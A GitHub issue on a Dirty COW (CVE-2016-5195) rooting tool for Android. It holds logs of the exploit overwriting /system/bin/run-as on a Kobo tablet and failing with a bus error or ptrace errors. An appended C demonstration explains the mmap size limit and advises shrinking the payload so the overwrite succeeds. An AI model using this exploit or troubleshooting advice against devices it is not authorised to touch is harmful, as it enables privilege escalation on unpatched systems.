
Kobo Arc 7HD gives a "bus error"

Open · eloydegen opened this issue 1 year ago · 1 comment

Running make root:

[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 29.5 MB/s (17880 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 79.8 MB/s (13784 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (13784) and destination file size (9464) differ
         corruption?

[*] size 13784
[*] mmap 0x401f6000
[*] currently 0x401f6000=464c457f
[*] using ptrace method
[*] check thread starts, address 0x401f6000, size 13784
[*] ptrace thread starts, address 0x401f6000, size 13784
[*] madvise thread starts, address 0x401f6000, size 13784
Bus error 

However, running make test:

[eloy@t480 CVE-2016-5195]$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 59.9 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed, 0 skipped. 2.7 MB/s (367 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2023-12-13 23:58 test
-rwxrwxrwx shell    shell         367 2023-12-13 22:56 test.sh
-r--r--r-- shell    shell          18 2023-12-13 23:58 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x40175000
[*] currently 0x40175000=72756f79
[*] using ptrace method
[*] check thread starts, address 0x40175000, size 18
[*] ptrace thread starts, address 0x40175000, size 18
[*] madvise thread starts, address 0x40175000, size 18
[*] check thread stops, patch successful, iterations 3
[*] ptrace thread stops, return code sum 0, iterations 4047
[*] finished pid=3302 sees 0x40175000=6e6c7576
[*] madvise thread stops, return code sum 0, iterations 65420
[*] finished pid=0 sees 0x40175000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

What is going wrong here?

eloydegen, Dec 13 '23 22:12

I reverted the repo a few commits back to test for regressions; now I get the following with HEAD at db1813c826c8738a3159743dc175964bedd5a608:

[eloy@t480 CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-17
make[1]: Entering directory `/home/eloy/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory `/home/eloy/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file pushed, 0 skipped. 89.0 MB/s (17880 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed, 0 skipped. 53.1 MB/s (13784 bytes in 0.000s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (13784) and destination file size (9464) differ

corruption?

[*] size 13784
[*] mmap 0x40259000
[*] currently 0x40259000=464c457f
[*] using ptrace method
[*] madvise = 0x40259000 13784
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
/data/local/tmp/dcow: ptrace(PTRACE_POKETEXT): I/O error
[*] ptrace -1 15
[*] exploited 4043 0x40259000=464c457f

Which might be related to #84.

eloydegen, Dec 13 '23 23:12
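Both runs above show the same boundary being hit in two ways. The tool warns that the replacement (13784 bytes) is larger than the stock /system/bin/run-as (9464 bytes), then tries to write all 13784 bytes into a mapping of the smaller file; on the current commit that ends in "Bus error", on the older commit in a string of ptrace(PTRACE_POKETEXT) I/O errors, and in both cases the file is untouched. A file-backed mmap only delivers data for pages that overlap the file: a page that lies entirely past the end of the file raises SIGBUS when touched directly, and a ptrace poke into it fails with EIO. The program below, added here as an illustration and not code from the dirtycow repository or from the reporter, reproduces that behaviour with a scratch file of the sizes quoted in the issue (9464 and 13784 are taken from the log; the page size is queried at runtime rather than assumed to be 4096). Whether this is the whole story on the Kobo is an assumption; the small test2 file in the `make test` run, where source and destination have the same size, is consistent with it.

```c
/* Added example: why a payload larger than the target file dies with
 * SIGBUS (or EIO via ptrace) when written through a mmap of that file.
 * Not from the dirtycow repo; sizes taken from the issue log. Linux/POSIX,
 * needs a writable /tmp. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Sizes copied from the issue: stock run-as is 9464 bytes, the NDK-built
 * replacement pushed to /data/local/tmp/run-as is 13784 bytes. */
#define DEST_LEN    9464
#define PAYLOAD_LEN 13784

static sigjmp_buf sigbus_env;

static void on_sigbus(int sig)
{
    (void)sig;
    siglongjmp(sigbus_env, 1);
}

/* First offset that sits in a page with no file data behind it at all
 * (file size rounded up to the page size). Touching such a page through
 * a file-backed mapping raises SIGBUS. */
size_t first_unbacked_offset(size_t file_size)
{
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    return (file_size + pg - 1) / pg * pg;
}

/* The check to make before starting the race: the tool can only
 * overwrite bytes the target already has, it cannot grow the file. */
int payload_fits(size_t payload_len, size_t dest_len)
{
    return payload_len <= dest_len;
}

/* Create a scratch file of file_size bytes, map it privately with a
 * mapping long enough to reach offset, and store one byte there.
 * Returns 1 if the store raised SIGBUS, 0 if it went through, -1 on a
 * setup error. The scratch file is unlinked right away. */
int probe_write(size_t file_size, size_t offset)
{
    char path[] = "/tmp/dcow-probe-XXXXXX";   /* constructed scratch file */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);
    if (ftruncate(fd, (off_t)file_size) < 0) {
        close(fd);
        return -1;
    }

    size_t map_len = offset + 1;              /* kernel rounds up to pages */
    volatile unsigned char *map =
        mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigbus;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGBUS, &sa, &old);

    volatile int faulted = 0;
    if (sigsetjmp(sigbus_env, 1) == 0)
        map[offset] = 0x41;   /* faults iff the page holds no file data */
    else
        faulted = 1;

    sigaction(SIGBUS, &old, NULL);
    munmap((void *)map, map_len);
    close(fd);
    return faulted;
}

int main(void)
{
    size_t edge = first_unbacked_offset(DEST_LEN);
    printf("payload fits target: %d\n", payload_fits(PAYLOAD_LEN, DEST_LEN));
    printf("write at %d (inside file):       SIGBUS=%d\n", DEST_LEN - 1,
           probe_write(DEST_LEN, DEST_LEN - 1));
    printf("write at %zu (last backed page):  SIGBUS=%d\n", edge - 1,
           probe_write(DEST_LEN, edge - 1));
    printf("write at %zu (first unbacked):    SIGBUS=%d\n", edge,
           probe_write(DEST_LEN, edge));
    printf("write at %d (end of payload):    SIGBUS=%d\n", PAYLOAD_LEN - 1,
           probe_write(DEST_LEN, PAYLOAD_LEN - 1));
    return 0;
}
```

Writes that land in the last partially backed page go through (they hit page cache past EOF and are never reflected in the file), so the size warning is the real signal: with a 9464-byte target, anything the exploit writes beyond offset 9463 is lost and anything beyond the end of that page kills the run. The practical answer to the question in the report is therefore to check `payload_fits` before running, which for these sizes is false, and to use a replacement binary no larger than the stock run-as on the device.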